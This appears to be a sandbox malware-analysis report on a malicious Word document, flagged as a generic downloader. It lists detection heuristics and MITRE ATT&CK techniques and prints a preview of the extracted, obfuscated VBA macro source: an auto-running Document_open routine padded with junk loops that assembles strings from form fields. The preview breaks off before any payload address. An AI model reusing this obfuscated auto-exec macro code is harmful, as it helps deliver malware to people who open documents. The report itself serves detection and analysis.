MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing obfuscated VBA macros. The presence of a Document_Open macro and GetObject calls strongly suggests an attempt to automatically execute malicious code upon opening. The ClamAV detection as 'Doc.Downloader.Generic' further supports the conclusion that this document is designed to download and execute a second-stage payload.
Heuristics 6
-
ClamAV: Doc.Downloader.Generic-7469762-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7469762-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7699 bytes |
SHA-256: d0844ef7b32133ef07fde84d5acd81b4b90e55e7250312c6bd74e6c9fcd45973 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Zjvhrbpst"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Pkcrbfruxqqk, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Vsxcsqthpsv = 234 + 423
Do While Ulhnztvlka = 1
Gwngbesmxjx = 3 * Yhzjjyiv
Pyrazmdlrk = ("Accusantium fugiat facilis commodi.")
For Ufboncinko = Amvbbcetqj To Jesatyfkn
Tiulgmccale = ("Adipisci alias ipsam.")
Qbjpftvkhte = 223
Next
Iumicznybt = Ygnhxwfefkr
Loop
Bsszujwlwp
Elbmdkymoc = 234 + 423
Do While Bzylxlobrkv = 1
Gbabwvha = 3 * Vimzgrkdekdx
Evnnjrup = ("Dolorem dolore corrupti doloribus quia qui.")
For Wjykrgmmtf = Kmhkghqq To Ozwbitqqzg
Cxszlyyq = ("Dolorum officia ex.")
Ybkbgylnz = 223
Next
Nuyopyswdgw = Kjrgvsrgfh
Loop
End Sub
Attribute VB_Name = "Qfwdvbgu"
Attribute VB_Base = "0{6040592D-7473-4FA1-A6DF-0842EDC07B88}{B609B1DD-DA11-4B56-9C5F-3FCF55B119A1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Pnzbzthe"
Function Meqzuwbavz()
Wfibprxaq = 234 + 423
Do While Nrycciltbbod = 1
Acqckyhcjbmo = 3 * Affvsliykg
Vdceicvio = ("Mollitia et repudiandae non.")
For Yftklhxqn = Tvwslakb To Mddezetkty
Yhpybxqnqb = ("Ullam inventore rerum.")
Jhipqvymwwlc = 223
Next
Lddfudeiw = Mznlftly
Loop
Jtzutbmrwixdv = Zjvhrbpst.Pkcrbfruxqqk
Avzrjevtuhn = 234 + 423
Do While Egxuonuvwh = 1
Hqllvyalrbwp = 3 * Ddfcbmrib
Pjgoueou = ("Lester")
For Njiyingt = Hjjkqptfrc To Hkgpuwwwivp
Uxdszlpztsf = ("Tenetur est exercitationem veniam modi consectetur consequatur et qui quo.")
Xfkicteybxstt = 223
Next
Gbmuhtwsqnsri = Sapxzrlzsvy
Loop
Vvsrfpwhqplea = Jtzutbmrwixdv + Qfwdvbgu.Tjsfwgoqave + Qfwdvbgu.Jficvhxaze + Qfwdvbgu.Eegbgwkm
Hzmadwle = 234 + 423
Do While Yxkucxbyeabn = 1
Kaykhwxn = 3 * Nkfnvvzidhy
Lvpfnnsbt = ("Harum soluta commodi.")
For Qcxbxkvlwt = Sncjasknbnun To Qkzjpugtwtxy
Mnamfdwrlesi = ("Explicabo ut sunt est sint unde molestiae.")
Kciklftklnd = 223
Next
Zqjlbhrbon = Lvzzuqglp
Loop
Tqralznxyvlm = Vvsrfpwhqplea + Qfwdvbgu.Tacswkkfl + Qfwdvbgu.Fuwkkodvb.Tag
Nvoqwrhvd = 234 + 423
Do While Magnjdknxvq = 1
Fxevkerkxghj = 3 * Ttkbelqjbtlg
Nplxaukz = ("Minus mollitia et.")
For Kyadouydhj = Ntmjdwvlkezo To Vkjhjugyr
Muhuhyvlub = ("Quaerat perspiciatis vel eum veniam totam.")
Qqodbbgzmh = 223
Next
Ntaawmpcgyqbo = Gdcbgdzt
Loop
Meqzuwbavz = Pdjuarjmpsw + Tqralznxyvlm + Pdjuarjmpsw
Iaksnxnfhszrx = 234 + 423
Do While Ugrllztrbs = 1
Qaqsidjt = 3 * Svrmifznysf
Qmhdyoijzvtwf = ("Ipsam molestiae sit suscipit.")
For Rnnkqhov = Qosnuayzaafaa To Mdtaxpdpy
Euzrcqneiz = ("Tempora reiciendis rerum illo.")
Fvvweqvqncfee = 223
Next
Vjnzuqjwdaix = Vcewhnfcsyz
Loop
End Function
Function Bsszujwlwp()
Whupiiumtthh = 234 + 423
Do While Rdplwuce = 1
Idieaejun = 3 * Fwkyqksgkncj
Xmcmwpsl = ("Laborum molestiae.")
For Fzqmpkmul = Hfnfkjxltg To Edrhiqtyt
Trugraah = ("Ralph")
Nphpgmgvauam = 223
Next
Ixdddrkszb = Pcfksyuoqnk
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
Bfhcxbxio = 234 + 423
Do While Wtvyxxvtacda = 1
Hxswohpjjch = 3 * Wlgzwdjfhbg
Gwzbxeqppd = ("Voluptate similique sapiente maiores.")
For Zkenjsqdky = Dhxhizvlldas To Fddxhhbnw
Rxjqhbhoe = ("Natus ullam et.")
Hihqhsawjld = 223
Next
Mzmraspledq = Udctefjpwv
Loop
Xshokoctxdop = Split("
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.